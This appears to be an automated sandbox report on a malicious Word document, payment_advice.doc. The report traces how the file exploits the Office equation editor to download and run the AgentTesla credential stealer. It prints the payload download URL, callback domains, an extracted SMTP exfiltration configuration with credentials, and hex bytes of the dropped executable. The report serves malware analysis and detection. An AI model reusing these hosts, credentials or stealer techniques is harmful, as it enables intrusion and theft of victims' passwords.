Play interactive tour

Edit tour

Analysis Report payment_advice.doc

Overview

General Information

Sample Name:	payment_advice.doc
Analysis ID:	356799
MD5:	0ea6e37e930278b71774ae91d68bb879
SHA1:	5e3721c21b04c30c0f2d3b7e83b7bb506fd55cb8
SHA256:	3fda6eb4d90828826854806f1956d0d4a20bf5f95eb917370ff05ba5ba1dde66
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Binary contains a suspicious time stamp

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2472 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2300 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

twox67345.exe (PID: 2292 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)

cmd.exe (PID: 2944 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 2996 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

twox67345.exe (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)

twox67345.exe (PID: 2952 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)

UGxXf.exe (PID: 2500 cmdline: 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe' MD5: 3DC83F17122DD592D607424A54C1E9CB)

cmd.exe (PID: 2924 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)

timeout.exe (PID: 2984 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)

UGxXf.exe (PID: 648 cmdline: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)

UGxXf.exe (PID: 1836 cmdline: 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe' MD5: 3DC83F17122DD592D607424A54C1E9CB)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "pEOdpd0kIi", "URL: ": "https://n2pGpXVLT5FR.net", "To: ": "", "ByHost: ": "mail.tpcdel.com:587", "Password: ": "ki7OGHHnlVdG04A", "From: ": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: UGxXf.exe PID: 2500	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: twox67345.exe PID: 2292	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: twox67345.exe PID: 2952	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: twox67345.exe PID: 2952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
11.2.UGxXf.exe.39bd920.7.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.twox67345.exe.38b4700.9.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.twox67345.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.UGxXf.exe.3974700.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.twox67345.exe.38fd920.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
16.2.UGxXf.exe.400000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.UGxXf.exe.3974700.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.twox67345.exe.38fd920.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
11.2.UGxXf.exe.39bd920.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.twox67345.exe.38b4700.9.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\twox67345.exe, CommandLine: C:\Users\user\AppData\Roaming\twox67345.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\twox67345.exe, NewProcessName: C:\Users\user\AppData\Roaming\twox67345.exe, OriginalFileName: C:\Users\user\AppData\Roaming\twox67345.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2300, ProcessCommandLine: C:\Users\user\AppData\Roaming\twox67345.exe, ProcessId: 2292

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 150.95.81.183, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://tunedinblog.com/wp-includes/twox.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: twox67345.exe.2952.9.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "pEOdpd0kIi", "URL: ": "https://n2pGpXVLT5FR.net", "To: ": "", "ByHost: ": "mail.tpcdel.com:587", "Password: ": "ki7OGHHnlVdG04A", "From: ": ""}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\twox67345.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Show sources

Source: payment_advice.doc

ReversingLabs: Detection: 43%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\twox67345.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp

Software Vulnerabilities:

Source: global traffic

DNS query: name: tunedinblog.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49165 -> 150.95.81.183:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://n2pGpXVLT5FR.net

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 15:53:54 GMTServer: Apache/2.2.31 (CentOS)Last-Modified: Tue, 23 Feb 2021 07:25:52 GMTETag: "211e7-99b78-5bbfbd40d5228"Accept-Ranges: bytesContent-Length: 629624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 be 7d f2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 06 00 00 00 00 00 00 2e 9b 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 8c 7e 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 9a 09 00 57 00 00 00 00 a0 09 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 84 09 00 78 17 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 03 00 00 00 a0 09 00 00 04 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9b 09 00 00 00 00 00 48 00 00 00 02 00 05 00 58 61 09 00 7c 39 00 00 03 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 17 00 00 0a 00 2a a6 73 18 00 00 0a 80 01 00 00 04 73 19 00 00 0a 80 02 00 00 04 73 0b 00 00 06 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 42 02 28 17 00 00 0a 00 00 02 28 09 00 00 06 00 2a 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 58 01 00 70 fe 0e 01 00 72 5c 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 20 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 2a 00 00 01 10 00 00 02 00 24 00 6a 8e 00 11 00 00 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 68 01 00 70 fe 0e 01 00 72 7e 01 00 70 fe 0e 02

Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com

Source: Joe Sandbox View

IP Address: 172.67.172.17 172.67.172.17

Source: Joe Sandbox View

ASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587

Source: global traffic

HTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B08F3ED-537D-406E-B057-1B1541B1D39D}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com

Source: unknown

DNS traffic detected: queries for: tunedinblog.com

Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, twox67345.exe, 00000004.00000002.2272168458.00000000007BC000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2329693742.000000000069C000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: twox67345.exe, 00000009.00000002.2360313482.0000000002814000.00000004.00000001.sdmp	String found in binary or memory: http://mail.tpcdel.com
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: twox67345.exe, 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp	String found in binary or memory: https://n2pGpXVLT5FR.net
Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\twox67345.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe

Code function: 11_2_0679C010 NtSetInformationThread,

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00601A69
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00600048
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00601788
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0060408A
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00600115
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_006005B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061B4B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00616898
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00617128
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061C900
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061D108
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_006189BF
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00614A08
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00617467
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061342F
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061908D
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061812F
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00617118
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061F5E8
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061A1C0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061A1B0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061F180
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061764F
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_006132E0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00615ABE
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061AF28
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061FBF0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_0061B788
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F9630
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F5620
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F6A1E
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F4A08
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F07A8
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F0B80
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F9828
